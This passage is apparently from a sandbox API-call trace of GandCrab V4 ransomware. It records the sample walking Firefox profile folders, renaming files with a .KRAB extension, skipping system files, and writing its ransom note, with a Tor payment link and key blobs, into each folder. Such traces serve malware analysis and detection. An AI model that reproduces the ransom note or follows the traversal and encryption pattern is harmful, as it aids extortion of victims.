lpOverlapped=0x0) returned 1 [0083.559] CloseHandle (hObject=0x7ec) returned 1 [0083.559] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.560] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.560] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1e, wMilliseconds=0x2f9)) [0083.560] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.560] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.560] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.569] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock") returned 111 [0083.569] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7ec [0083.570] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.570] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.571] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned 88 [0083.571] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*" [0083.571] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x10235f8 [0083.571] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.571] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.571] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.571] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.571] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.571] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.571] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.571] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock" [0083.571] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.572] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 116 [0083.572] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a08d2ca4dee3d.lock") returned 111 [0083.572] lstrlenW (lpString=".lock") returned 5 [0083.572] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.572] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.572] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.572] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.573] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.573] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.573] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.573] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt" [0083.573] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.573] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt.KRAB") returned 109 [0083.573] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt") returned 104 [0083.573] lstrlenW (lpString=".txt") returned 4 [0083.573] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.574] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.574] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.574] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt") returned 104 [0083.574] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\KRAB-DECRYPT.txt") returned 104 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.574] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.575] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.575] FindNextFileW (in: hFindFile=0x10235f8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0083.575] lstrcmpW (lpString1="permanent", lpString2=".") returned 1 [0083.575] lstrcmpW (lpString1="permanent", lpString2="..") returned 1 [0083.575] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="permanent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0083.575] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\" [0083.575] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.575] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.575] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.575] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.576] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.576] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.576] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.576] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\\\KRAB-DECRYPT.txt") returned 115 [0083.576] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0083.578] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.578] WriteFile (in: hFile=0x718, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.581] CloseHandle (hObject=0x718) returned 1 [0083.581] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.581] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.581] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1e, wMilliseconds=0x308)) [0083.582] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.582] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.582] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.582] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock") returned 121 [0083.582] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x718 [0083.636] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.636] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.636] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\") returned 98 [0083.636] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*" [0083.636] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x10231f8 [0083.637] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.637] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0083.637] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.637] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.637] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0083.637] lstrcmpW (lpString1="chrome", lpString2=".") returned 1 [0083.637] lstrcmpW (lpString1="chrome", lpString2="..") returned 1 [0083.637] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="chrome" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0083.637] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\" [0083.637] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.637] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.637] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.637] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.637] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.649] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.649] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.650] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\\\KRAB-DECRYPT.txt") returned 122 [0083.650] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x72c [0083.660] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGv